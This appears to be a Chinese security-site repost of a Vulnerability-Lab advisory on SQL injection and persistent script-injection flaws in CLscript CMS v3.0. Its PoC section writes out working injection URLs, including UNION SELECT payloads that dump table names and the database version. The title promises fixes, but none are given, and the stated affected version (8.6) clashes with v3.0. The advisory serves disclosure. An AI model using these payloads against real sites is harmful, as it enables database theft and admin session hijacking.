CLscript CMS v3.0多重缺陷的介绍及其修复方法

所属分类: 网络安全 / 安全设置 阅读数: 134
收藏 0 赞 0 分享
CLscript CMS v3.0 - Multiple Web Vulnerabilities
缺陷影响版本:8.6
程序介绍:
=============
With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and
use many new Features. The Classifieds Software is search Engine friendly to gain better Promotion
Aspects at search Engines. The whole Structure is manageable through easy to use AdminPanel.
In developing the Classified Software, we have geared ourselves to the most successful
Classifieds-Sites on the Internet. You can generate real Income from your Classifieds Website.
更多请查看官网
摘要
=========
CLscript v3.0 Content Management System中被发现多个缺陷
影响产品:
==================
CLscript COM
Product: CLscript Classified Software v3.0
技术分析:
========
1.1
多个注射
The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected
application dbms. The vulnerabilities are located in the userDetail.php, advertise_detail.php or
land.php files with the bound vulnerable pid, rid and id parameters. Successful exploitation of the
vulnerability results in dbms, service & application compromise.
Vulnerable File(s):
[+] userDetail.php
[+] advertise_detail.php
[+] land.php
Vulnerable Module(s):
[+] land
[+] pageDetail
[+] enquiry_detail
[+] userDetail
[+] advertise_detail
[+] config_id
Vulnerable Module(s):
[+] rID
[+] ID
[+] pID
[+] faq_id
[+] sp_id
[+] config_id
1.2
Multiple persistent input validation vulnerabilities are detected in the CLscript v3.0 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The input validation vulnerabilities are located in the topic, new word, subcategories, add a new help, add currency
or add new FAQs modules. Remote attackers can inject script code to the vulnerable modules by injecting malicious
tags as titles, descriptions, word names, category names, currency code or as questions. Successful exploitation
of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action & privileged user account.
Vulnerable Module(s):
[+] Topic
[+] New word
[+] Subcategory
[+] Add a new help
[+] Add currency (Symbol - Currency code)
[+] Add new FAQ (Question)
Vulnerable Parameter(s):
[+] (title - description)
[+] (word name)
[+] (category name)
[+] (name)
[+] (symbol - currency code)
[+] (question)
测试证明:
=================
The sql injection vulnerabilities can be exploited by remote attackers without privileged user accounts or user inter action.
For demonstration or reproduce ...
PoC:
http:// /[INTERFACE]/land.php?file=edit_config&config_id=1'+order+by+1--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_config&config_id=-1'+union+select+1,
group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_diycontent&pid=5'[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=add_edit_spam_words&sp_id=45'[SQL-INJECTION!]
http:// /[INTERFACE]/land.php?file=catalog&parentId=608[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/userDetail.php?id=487[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/advertise_detail.php?id=77[SQL-INJECTION!]
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=edit_faq&faq_id=24[SQL-INJECTION!]
1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with local low privileged user accounts and
with low required user inter action. For demonstration or reproduce ...
PoC:
1) http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_forum
create topic (title - description is injectable)
2)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_spam_words -
add a new word (word is injectable)
3)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=catalog&parentId=608 -
add subcategory (category name is injectable)
4)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_help -
add a new help
5)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_currencie
Add currency (Symbol - Currency code is injectable)
6)
http://n1.127.0.0.1:1338/[INTERFACE]/land.php?file=manage_faq
add new FAQ (Question is injectable)
风险
=====
1.1
The security risk of the sql injection vulnerabilities are estimated as critical.
1.2
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com
更多精彩内容其他人还在看

用IP安全策略自动设置工具的遇到故障与解决方法

我最新在服务器上使用了IP安全策略自动设置工具,服务器是web站点,开80,20,21,3389等。
收藏 0 赞 0 分享

分享几个WebSite网站防黑经验

分享几个WebSite网站防黑经验,站长朋友可以参考下。
收藏 0 赞 0 分享

在Windows 下关闭21\23\25端口的方法

在Windows 下关闭21\23\25端口的方法,有时候为了安全我们需要禁止一些端口
收藏 0 赞 0 分享

招你几教 让你防止电脑辐射

对于生活紧张而忙碌的人群来说,抵御电脑辐射最简单的办法就是在每天上午喝2至3杯的绿茶,吃一个橘子
收藏 0 赞 0 分享

教你把电脑屏幕设置成可以保护眼睛的颜色

我们知道,长期使用电脑,眼睛盯着屏幕会使眼睛非常干涩、疲劳,所以现在流行将电脑设置成可以保护眼睛的颜色。
收藏 0 赞 0 分享

家庭用路由器功能的详细介绍

现在的宽带路由器不少功能对于一般家庭用户来说确实非常实用,可以提高很多网络应用程序的执行效果。下面谈谈家用路由器所具备的功能,顺便告诉大家哪些功能比较实用、哪些功能意义不大。
收藏 0 赞 0 分享

你的路由要hold住 带宽提速时代

近日,工业和信息化部召开宽带普及提速工程动员部署大会,在会上宣布正式启动实施“宽带普及提速工程”,至此,我国备受关注和带宽提速开始了。
收藏 0 赞 0 分享

用路由器限制别人的网速的技巧

在学校里面每个寝室使用一根线在上网,如果有人在下载的话,导致网速变得很慢,有没有什么办法可以限制别人的网速,来限制下载速度呢。当然是可以的,下面笔者来教我们怎么去限制别人的网速来限制别人下载的速度。
收藏 0 赞 0 分享

路由器与路由器互相连接详细设置图文教程

本文将为大家详细讲述路由接路由的设置方法,下面以图示先标明局域网各路由间的接法:
收藏 0 赞 0 分享

家用无线路由器安全设置必读

伴随着各运营商的宽带大提速,无线已经成为家庭组网的首选。老百姓真真切切地感觉到:无线真好!而且各厂商的在无线路由器的设置上也尽力做到人性化,以帮助大叔大妈们也能轻松的设置家庭无线网络,但一提到如何让家里的无线网络更加安全?很多大妈又犯了难,认为安全防护
收藏 0 赞 0 分享
查看更多